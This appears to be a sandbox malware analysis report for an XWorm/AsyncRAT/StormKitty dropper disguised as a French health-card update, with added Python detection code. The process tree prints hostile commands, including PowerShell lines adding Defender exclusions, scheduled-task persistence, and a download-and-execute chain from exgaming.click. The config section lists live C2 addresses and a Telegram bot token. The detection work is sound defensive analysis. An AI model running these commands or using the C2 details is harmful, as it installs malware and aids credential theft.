Analysis
-
max time kernel: 152s
max time network: 165s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 18-04-2024 01:36
-
Behavioral task: behavioral1
Sample: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Resource: win7-20240221-en
-
Behavioral task: behavioral2
Sample: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Resource: win10v2004-20240412-en
General
-
Target: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Size: 167KB
MD5: d0685487fa7e474e68a40a1b1ff49b60
SHA1: 069285708e07814d852bbd5f39a7ffbb3c9e2d94
SHA256: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
SHA512: eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8
SSDEEP: 1536:216oQ/DtPFVzE95jNNKCw5VY9bG1wWQkAw6JOXHWIOGoWIFjo7xLFVGy9w04xJXX:ouxFG9Rw3Y9bGVAfOXWxrjCT4
Malware Config
-
Extracted: http://xcu.exgaming.click
Extracted: http://xcu5.exgaming.click
-
Extracted: xworm
C2 (host:port): dentiste.ddns.net:7000, 86.68.222.14:7000, 51.254.53.24:7000
Install_directory: %AppData%
install_file: Mise à jour carte CPS.exe (French: "CPS card update")
telegram: https://api.telegram.org/bot5720516014:AAF4KOAv3GXHFU0RS3g4HPsucKDwQf01__A
-
Extracted: asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
hoyqzolrquxmbnzaee
delay: 1
install: true
install_file: system.exe
install_folder: %AppData%
pastebin_config: https://pastebin.com/raw/ckrnc4Uk
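The extracted configuration above yields three kinds of network indicators: the XWorm C2 endpoints (host:port), the two stage-download hosts under exgaming.click, and two channels on legitimate services (a Telegram bot and a Pastebin raw URL). The Python below is an added example, not code from the sandbox report or from either malware family; it turns those values into matching rules and runs them over constructed DNS, connection and HTTP records. The record layout (a simplified dns/conn/http shape), the source addresses and the decoy Telegram URL are assumptions. The Telegram rule matches on the bot ID rather than the full token, because the secret after the colon can be rotated by the operator while the numeric ID stays, and traffic to a C2 IP on a port other than 7000 is reported at lower confidence rather than ignored.

```python
from urllib.parse import urlsplit

# Indicators copied from the report's Malware Config section.
XWORM_C2 = {("dentiste.ddns.net", 7000), ("86.68.222.14", 7000), ("51.254.53.24", 7000)}
DOWNLOAD_URLS = {"http://xcu.exgaming.click", "http://xcu5.exgaming.click"}
TELEGRAM_BOT = "https://api.telegram.org/bot5720516014:AAF4KOAv3GXHFU0RS3g4HPsucKDwQf01__A"
PASTEBIN_CONFIG = "https://pastebin.com/raw/ckrnc4Uk"


def _is_ip(host: str) -> bool:
    return host.replace(".", "").isdigit()


def _bot_id(url: str):
    """Telegram bot URLs look like /bot<id>:<secret>/<method>; return <id> or None."""
    path = urlsplit(url).path
    if not path.startswith("/bot"):
        return None
    return path[4:].split("/", 1)[0].split(":", 1)[0]


C2_IPS = {h for h, _ in XWORM_C2 if _is_ip(h)}
# Exact hostnames to watch, plus the registered domain of the stage URLs so that a
# new xcu*.exgaming.click label is caught too (assumption: the actor keeps the domain).
WATCH_HOSTS = {h for h, _ in XWORM_C2 if not _is_ip(h)} | {urlsplit(u).hostname for u in DOWNLOAD_URLS}
WATCH_SUFFIXES = {"exgaming.click"}
TELEGRAM_BOT_ID = _bot_id(TELEGRAM_BOT)          # "5720516014"
PASTEBIN_PATH = urlsplit(PASTEBIN_CONFIG).path   # "/raw/ckrnc4Uk"


def host_matches(host: str) -> bool:
    """True for a watched hostname or any name under a watched registered domain."""
    host = host.lower().rstrip(".")
    return host in WATCH_HOSTS or any(host == s or host.endswith("." + s) for s in WATCH_SUFFIXES)


def classify(rec: dict) -> list:
    """Return the indicator labels a single DNS/conn/HTTP record matches."""
    labels = []
    if rec["type"] == "dns" and host_matches(rec["query"]):
        labels.append("dns_lookup_c2_or_stage_host")
    elif rec["type"] == "conn":
        if (rec["dst"], rec["dport"]) in XWORM_C2:
            labels.append("xworm_c2_ip_port")
        elif rec["dst"] in C2_IPS:
            labels.append("xworm_c2_ip_other_port")   # same host, unlisted port: lower confidence
    elif rec["type"] == "http":
        u = urlsplit(rec["url"])
        host = (u.hostname or "").lower()
        if host_matches(host):
            labels.append("stage_download_host")
        if host == "api.telegram.org" and _bot_id(rec["url"]) == TELEGRAM_BOT_ID:
            labels.append("xworm_telegram_bot")
        if host == "pastebin.com" and u.path == PASTEBIN_PATH:
            labels.append("asyncrat_pastebin_config")
    return labels


def scan(log: list) -> list:
    """(source host, label) for every match in the log, in log order."""
    return [(rec["src"], label) for rec in log for label in classify(rec)]


# Constructed telemetry (not from the report): two infected hosts and one clean one.
SAMPLE_LOG = [
    {"type": "dns",  "src": "10.0.0.5", "query": "dentiste.ddns.net"},
    {"type": "conn", "src": "10.0.0.5", "dst": "86.68.222.14", "dport": 7000},
    {"type": "conn", "src": "10.0.0.5", "dst": "86.68.222.14", "dport": 443},
    {"type": "http", "src": "10.0.0.5", "url": "http://xcu5.exgaming.click/"},
    {"type": "http", "src": "10.0.0.7", "url": TELEGRAM_BOT + "/sendMessage"},
    {"type": "http", "src": "10.0.0.7", "url": "https://api.telegram.org/bot1234567890:unrelatedtoken/sendMessage"},
    {"type": "http", "src": "10.0.0.9", "url": "https://pastebin.com/raw/ckrnc4Uk"},
    {"type": "dns",  "src": "10.0.0.9", "query": "www.example.com"},
]

if __name__ == "__main__":
    for src, label in scan(SAMPLE_LOG):
        print(src, label)
```

Matching api.telegram.org or pastebin.com as bare hostnames would be too noisy on most networks; the path-level checks above are what make these two indicators usable, and the dynamic-DNS C2 name should be treated as volatile since the operator can repoint it at will.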
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource: behavioral2/memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp
yara_rule: disable_win_def
-
Detect Xworm Payload 2 IoCs
Processes:
resource: behavioral2/memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp
yara_rule: family_xworm
resource: C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
yara_rule: family_xworm
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource: behavioral2/memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp
yara_rule: family_stormkitty
-
Async RAT payload 1 IoCs
Processes:
resource: C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
yara_rule: family_asyncrat
-
Detects Windows executables referencing non-Windows User-Agents 2 IoCs
Processes:
resource: behavioral2/memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
resource: C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
yara_rule: INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
-
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
Processes:
resource: behavioral2/memory/4196-93-0x000000001B880000-0x000000001B88E000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_Binary_References_Browsers
-
Detects executables attempting to enumerate video devices using WMI 2 IoCs
Processes:
resource: C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
yara_rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice
resource: behavioral2/memory/1412-97-0x0000000000920000-0x0000000000938000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice
-
Detects executables containing artifacts associated with disabling Windows Defender 1 IoCs
Processes:
resource: behavioral2/memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_DisableWinDefender
-
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 1 IoCs
Processes:
resource: behavioral2/memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender
-
Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
Processes:
resource: behavioral2/memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID
-
Detects executables referencing credit card regular expressions 1 IoCs
Processes:
resource: behavioral2/memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_CC_Regex
-
Detects executables using Telegram Chat Bot 2 IoCs
Processes:
resource: behavioral2/memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
resource: C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
yara_rule: INDICATOR_SUSPICIOUS_EXE_TelegramChatBot
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe, xoxmpc.exe, system.exe
description / ioc / process:
Key value queried: \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation (process: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe)
Key value queried: \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation (process: xoxmpc.exe)
Key value queried: \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation (process: system.exe)
-
Drops startup file 2 IoCs
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
description / ioc / process:
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk (process: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk (process: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe)
-
Executes dropped EXE 4 IoCs
Processes: Mise à jour carte CPS.exe, xoxmpc.exe, system.exe, Mise à jour carte CPS.exe
pid / process:
3132 Mise à jour carte CPS.exe
1412 xoxmpc.exe
2436 system.exe
2212 Mise à jour carte CPS.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
description / ioc / process:
Set value (str): \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe" (process: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe)
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe, schtasks.exe
pid / process:
4140 schtasks.exe
744 schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes: timeout.exe
pid / process:
3932 timeout.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
pid / process:
4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe (pids 1192, 3944, 4160, 5108, 2200, 1268, 4964, 2256, 2964, 1784), 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe (4196), xoxmpc.exe (1412), system.exe (2436)
pid / process (number of events, 64 in total):
1192 powershell.exe (2)
3944 powershell.exe (2)
4160 powershell.exe (2)
5108 powershell.exe (2)
4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe (1)
2200 powershell.exe (2)
1412 xoxmpc.exe (29)
1268 powershell.exe (2)
4964 powershell.exe (2)
2256 powershell.exe (2)
2964 powershell.exe (2)
1784 powershell.exe (2)
2436 system.exe (14)
-
Suspicious use of AdjustPrivilegeToken 20 IoCs
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe, powershell.exe, Mise à jour carte CPS.exe, xoxmpc.exe, system.exe
description / pid / process:
Token: SeDebugPrivilege 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Token: SeDebugPrivilege 1192 powershell.exe
Token: SeDebugPrivilege 3944 powershell.exe
Token: SeDebugPrivilege 4160 powershell.exe
Token: SeDebugPrivilege 5108 powershell.exe
Token: SeDebugPrivilege 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Token: SeDebugPrivilege 3132 Mise à jour carte CPS.exe
Token: SeDebugPrivilege 1412 xoxmpc.exe
Token: SeDebugPrivilege 2200 powershell.exe
Token: SeDebugPrivilege 1412 xoxmpc.exe
Token: SeDebugPrivilege 1268 powershell.exe
Token: SeDebugPrivilege 4964 powershell.exe
Token: SeDebugPrivilege 2256 powershell.exe
Token: SeDebugPrivilege 2436 system.exe
Token: SeDebugPrivilege 2964 powershell.exe
Token: SeDebugPrivilege 1784 powershell.exe
Token: SeDebugPrivilege 2436 system.exe
Token: SeDebugPrivilege 968 powershell.exe
Token: SeDebugPrivilege 1056 powershell.exe
Token: SeDebugPrivilege 2212 Mise à jour carte CPS.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe, system.exe
pid / process:
4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
2436 system.exe
-
Suspicious use of WriteProcessMemory 42 IoCs
Processes: 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe, xoxmpc.exe, cmd.exe, system.exe
source pid / source process -> target pid / target process (each pair is recorded twice, 42 events in total):
PID 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe wrote to memory of 1192 powershell.exe (x2)
PID 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe wrote to memory of 3944 powershell.exe (x2)
PID 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe wrote to memory of 4160 powershell.exe (x2)
PID 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe wrote to memory of 5108 powershell.exe (x2)
PID 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe wrote to memory of 4140 schtasks.exe (x2)
PID 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe wrote to memory of 1412 xoxmpc.exe (x2)
PID 1412 xoxmpc.exe wrote to memory of 4332 cmd.exe (x2)
PID 4332 cmd.exe wrote to memory of 2200 powershell.exe (x2)
PID 4332 cmd.exe wrote to memory of 1268 powershell.exe (x2)
PID 1412 xoxmpc.exe wrote to memory of 404 cmd.exe (x2)
PID 1412 xoxmpc.exe wrote to memory of 3492 cmd.exe (x2)
PID 404 cmd.exe wrote to memory of 744 schtasks.exe (x2)
PID 3492 cmd.exe wrote to memory of 3932 timeout.exe (x2)
PID 4332 cmd.exe wrote to memory of 4964 powershell.exe (x2)
PID 4332 cmd.exe wrote to memory of 2256 powershell.exe (x2)
PID 3492 cmd.exe wrote to memory of 2436 system.exe (x2)
PID 2436 system.exe wrote to memory of 3620 cmd.exe (x2)
PID 3620 cmd.exe wrote to memory of 2964 powershell.exe (x2)
PID 3620 cmd.exe wrote to memory of 1784 powershell.exe (x2)
PID 3620 cmd.exe wrote to memory of 968 powershell.exe (x2)
PID 3620 cmd.exe wrote to memory of 1056 powershell.exe (x2)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
[depth 1] C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\schtasks.exe
    Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
    - Creates scheduled task(s)

  [depth 2] C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [depth 3] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
        - Creates scheduled task(s)

    [depth 3] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat""
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\system32\timeout.exe
        Command line: timeout 3
        - Delays execution with timeout.exe

      [depth 4] C:\Users\Admin\AppData\Roaming\system.exe
        Command line: "C:\Users\Admin\AppData\Roaming\system.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
          - Suspicious use of WriteProcessMemory

          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
            - Suspicious use of AdjustPrivilegeToken

          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
            - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

[depth 1] C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
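The process tree shows four behaviours that can be alerted on without relying on this sample's hashes: PowerShell adding Defender exclusions for the dropper and its install copy, schtasks creating highest-privilege tasks that fire every minute or at logon from %AppData%, a cmd.exe chain that downloads into %Temp% and immediately Start-Process-es what it fetched, and dropped names ExpIorer.exe / ExplIorer.exe chosen to pass for explorer.exe (a capital I standing in for a lowercase l). The Python below is an added example, not code from the sandbox report; it runs that detection logic over constructed process-creation records in a Sysmon Event ID 1-like shape. The field set, the PIDs, the shortened dropper path and the two benign control records are assumptions; the command lines mirror the ones in the tree above.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; field set is an assumption)."""
    pid: int
    image: str
    command_line: str


# Paths an unprivileged user can write to; persistence that points here is suspicious.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)", re.I)
DOWNLOAD_PRIMITIVE = re.compile(r"\.DownloadFile\(|\.DownloadString\(|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
START_PRIMITIVE = re.compile(r"Start-Process\s+-FilePath", re.I)
TASK_TRIGGER = re.compile(r"/sc\s+(minute|onlogon|onstart)\b", re.I)
TASK_TARGET = re.compile(r"""/tr\s+['"]+([^'"]+)""", re.I)
EXE_TOKEN = re.compile(r"""[^\s'"\\]+\.exe""", re.I)

# Names malware imitates; 'I', '1', '|' are folded to 'l' and '0' to 'o' before comparing.
SYSTEM_BINARIES = {"explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o"})


def _levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_binary(name: str):
    """Return the system binary that `name` imitates after confusable folding, or None."""
    base = name.rsplit("\\", 1)[-1]
    if base.lower() in SYSTEM_BINARIES:
        return None                      # the genuine name is not a lookalike
    folded = base.translate(CONFUSABLES).lower()
    for known in SYSTEM_BINARIES:
        if _levenshtein(folded, known) <= 1:
            return known
    return None


def detect(events):
    """Return (rule, pid) pairs for every record that matches a rule."""
    hits = []
    for ev in events:
        cl, img = ev.command_line, ev.image.rsplit("\\", 1)[-1].lower()
        if img == "powershell.exe" and DEFENDER_EXCLUSION.search(cl):
            hits.append(("defender_exclusion_added", ev.pid))
        if img == "schtasks.exe" and "/create" in cl.lower():
            target = TASK_TARGET.search(cl)
            if TASK_TRIGGER.search(cl) and target and USER_WRITABLE.search(target.group(1)):
                hits.append(("scheduled_task_to_user_path", ev.pid))
        if img in ("powershell.exe", "cmd.exe") and DOWNLOAD_PRIMITIVE.search(cl) and START_PRIMITIVE.search(cl):
            hits.append(("download_and_execute_chain", ev.pid))
        if any(lookalike_binary(m.group(0)) for m in EXE_TOKEN.finditer(cl)):
            hits.append(("lookalike_binary_name", ev.pid))
    return hits


# Constructed records mirroring the report's process tree, plus two benign controls (pids 9001, 9002).
SAMPLE_EVENTS = [
    ProcEvent(1192, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'"),
    ProcEvent(4140, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"'),
    ProcEvent(4332, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & exit"),
    ProcEvent(744, r"C:\Windows\system32\schtasks.exe",
              r"""schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'"""),
    ProcEvent(9001, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc onlogon /tn "Vendor agent" /tr "C:\Program Files\Vendor\agent.exe"'),
    ProcEvent(9002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile Get-MpPreference"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid}")
```

The lookalike rule accepts one edit after folding, so a benign `service.exe` would also be reported against `services.exe`; in production, pair it with the image's signer or path rather than relying on the name alone. The Defender-exclusion rule is worth keeping as a standalone alert: Add-MpPreference from an unelevated-looking chain like this one should be rare on managed endpoints, and each exclusion it adds survives the process that created it.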
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mise à jour carte CPS.exe.log
Filesize: 654B
MD5: 2ff39f6c7249774be85fd60a8f9a245e
SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
